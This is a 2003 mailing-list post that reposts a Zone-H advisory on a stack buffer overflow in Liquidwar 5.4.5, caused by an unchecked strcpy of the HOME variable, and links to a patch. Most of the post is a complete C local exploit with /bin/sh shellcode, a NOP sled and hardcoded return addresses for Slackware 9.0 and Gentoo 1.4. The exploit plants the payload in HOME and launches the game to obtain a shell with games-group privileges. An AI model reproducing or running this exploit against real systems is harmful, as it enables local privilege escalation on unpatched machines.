liquidwar's exploit

Angelo Rosiello <guilecool@usa.com> · 17 Sep 2003 12:18:03 -0000

                              Rosiello Security
                             All rights reserved.

http://www.rosiello.org
AUTHOR: Angelo Rosiello

--------------------------------------------------------------
POST BY ZONE-H

Vulnerable systems:
 * Liquidwar version 5.4.5

We can see the vulnerable code here:
#define STARTUP_MAX_PATH_LENGTH 1000
[...]
char STARTUP_CFG_PATH[STARTUP_MAX_PATH_LENGTH];
[...]
static void set_path (void)
{
char home_path[512];
char *home_env;
if (exist_argument_value (IDENT_CFG))
strcpy(STARTUP_CFG_PATH,get_argument_str (IDENT_CFG));
else
{
#ifdef ALLEGRO_UNIX
home_env=getenv("HOME");
strcpy(home_path,home_env); /* unchecked strcpy() */
strcat(home_path,"/");
#else
home_env="";
strcpy(home_path,home_env); /* unchecked strcpy() but not dangerous */
#endif
strcpy(STARTUP_CFG_PATH,home_path); /* unchecked strcpy() */
strcat(STARTUP_CFG_PATH,DEFAULT_CFG_PATH);
}

This vulnerability can be exploited by a local attacker to execute arbitrary code with gid=games privileges.

Solution:
It's possible to download a simple patch here: http://www.zone-h.org/download/file=4943.

Information provided by Astharot
-----------------------------------------------------------------

/* 
*
*                             http://www.rosiello.org
*			       (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Slakware 9.0.0 & Gentoo 1.4
*
* Author: Angelo Rosiello
* Mail  : angelo@rosiello.org
* URL   : http://ww.rosiello.org
* 
* Greetz: Astharot by Zone-H who posted the stack overflow bug
*
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/* /bin/sh */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP     0x90
#define LEN     520	      //Buffer for Slackware 9.0.0
//#define LEN   528	      //Buffer for Gentoo 1.4
#define RET     0xbffff414    //Valid Address for Slackware 9.0.0
//#define RET   0xbffff360    //Valid Address for Gentoo 1.4

int main()
{
	char buffer[LEN];
	long retaddr = RET;
	int i;

	fprintf(stderr, "\n(c) Rosiello Security 2003 - http://www.rosiello.org\n";);
	fprintf(stderr, "Liquidwar's exploit for Slackware 9.0.0\n");
	fprintf(stderr, "by Angelo Rosiello - angelo@rosiello.org\n\n");
	fprintf(stderr, "using address 0x%lx\n",retaddr);

	for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr;

	for (i=0;i<(LEN-strlen(shellcode)-50);i++) *(buffer+i) = NOP;

	memcpy(buffer+i,shellcode,strlen(shellcode));

	/* export the variable, run liquidwar */

	setenv("HOME", buffer, 1);
	execl("/usr/games/liquidwar","liquidwar",NULL);

	return 0;
}